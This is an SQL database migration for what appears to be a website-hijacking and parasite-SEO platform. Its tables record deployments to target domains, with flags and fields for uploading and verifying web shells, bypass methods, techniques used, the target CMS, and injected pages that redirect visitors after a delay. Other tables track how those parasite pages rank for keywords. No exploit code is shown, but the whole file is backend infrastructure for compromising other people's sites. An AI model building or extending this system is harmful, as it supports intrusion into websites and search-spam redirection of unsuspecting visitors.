CREATE TABLE `deploy_history` (
	`id` int AUTO_INCREMENT NOT NULL,
	`userId` int NOT NULL,
	`targetDomain` varchar(255) NOT NULL,
	`targetUrl` text NOT NULL,
	`redirectUrl` text NOT NULL,
	`geoRedirect` boolean NOT NULL DEFAULT false,
	`keywords` json,
	`proxyCount` int NOT NULL DEFAULT 0,
	`maxRetries` int NOT NULL DEFAULT 5,
	`parasiteEnabled` boolean NOT NULL DEFAULT false,
	`parasiteContentLength` varchar(16) DEFAULT 'medium',
	`parasiteRedirectDelay` int DEFAULT 5,
	`deployStatus` enum('running','success','partial','failed') NOT NULL DEFAULT 'running',
	`totalSteps` int NOT NULL DEFAULT 9,
	`completedSteps` int NOT NULL DEFAULT 0,
	`filesDeployed` int NOT NULL DEFAULT 0,
	`filesAttempted` int NOT NULL DEFAULT 0,
	`shellUploaded` boolean NOT NULL DEFAULT false,
	`shellVerified` boolean NOT NULL DEFAULT false,
	`redirectActive` boolean NOT NULL DEFAULT false,
	`directUploadUsed` boolean NOT NULL DEFAULT false,
	`deployedUrls` json,
	`verifiedRedirectUrls` json,
	`shellUrl` text,
	`parasitePages` json,
	`parasitePagesCount` int NOT NULL DEFAULT 0,
	`errorBreakdown` json,
	`successCount` int NOT NULL DEFAULT 0,
	`failedCount` int NOT NULL DEFAULT 0,
	`retryCount` int NOT NULL DEFAULT 0,
	`duration` int,
	`report` text,
	`techniqueUsed` varchar(64),
	`bypassMethod` varchar(64),
	`cms` varchar(32),
	`startedAt` timestamp NOT NULL DEFAULT (now()),
	`completedAt` timestamp,
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	`updatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `deploy_history_id` PRIMARY KEY(`id`)
);
--> statement-breakpoint
CREATE TABLE `parasite_keyword_rankings` (
	`id` int AUTO_INCREMENT NOT NULL,
	`userId` int NOT NULL,
	`deployHistoryId` int,
	`keyword` varchar(500) NOT NULL,
	`parasitePageUrl` text NOT NULL,
	`targetDomain` varchar(255) NOT NULL,
	`redirectUrl` text,
	`searchEngine` varchar(32) NOT NULL DEFAULT 'google',
	`country` varchar(8) NOT NULL DEFAULT 'TH',
	`rankDevice` enum('desktop','mobile') NOT NULL DEFAULT 'desktop',
	`position` int,
	`previousPosition` int,
	`bestPosition` int,
	`positionChange` int,
	`serpTitle` text,
	`serpSnippet` text,
	`serpUrl` text,
	`isIndexed` boolean NOT NULL DEFAULT false,
	`indexedAt` timestamp,
	`searchVolume` int,
	`keywordDifficulty` int,
	`cpc` decimal(8,2),
	`keywordRankStatus` enum('tracking','indexed','ranked','top10','top3','lost','deindexed') NOT NULL DEFAULT 'tracking',
	`keywordRankTrend` enum('rising','stable','falling','new','lost') DEFAULT 'new',
	`checkCount` int NOT NULL DEFAULT 0,
	`lastCheckedAt` timestamp,
	`nextCheckAt` timestamp,
	`checkInterval` int NOT NULL DEFAULT 86400,
	`aiInsight` text,
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	`updatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `parasite_keyword_rankings_id` PRIMARY KEY(`id`)
);
--> statement-breakpoint
CREATE TABLE `parasite_ranking_history` (
	`id` int AUTO_INCREMENT NOT NULL,
	`keywordRankingId` int NOT NULL,
	`position` int,
	`isIndexed` boolean NOT NULL DEFAULT false,
	`serpTitle` text,
	`serpUrl` text,
	`checkedAt` timestamp NOT NULL DEFAULT (now()),
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	CONSTRAINT `parasite_ranking_history_id` PRIMARY KEY(`id`)
);
--> statement-breakpoint
CREATE TABLE `parasite_templates` (
	`id` int AUTO_INCREMENT NOT NULL,
	`userId` int,
	`name` varchar(255) NOT NULL,
	`slug` varchar(64) NOT NULL,
	`templateCategory` enum('news','review','article','faq','product','comparison','landing','blog','custom') NOT NULL DEFAULT 'article',
	`description` text,
	`htmlTemplate` text NOT NULL,
	`cssStyles` text,
	`defaultRedirectDelay` int NOT NULL DEFAULT 5,
	`seoScore` int,
	`hasSchemaMarkup` boolean NOT NULL DEFAULT true,
	`hasFaq` boolean NOT NULL DEFAULT false,
	`hasBreadcrumb` boolean NOT NULL DEFAULT true,
	`hasOpenGraph` boolean NOT NULL DEFAULT true,
	`timesUsed` int NOT NULL DEFAULT 0,
	`avgRankAchieved` int,
	`isSystem` boolean NOT NULL DEFAULT false,
	`isActive` boolean NOT NULL DEFAULT true,
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	`updatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `parasite_templates_id` PRIMARY KEY(`id`)
);
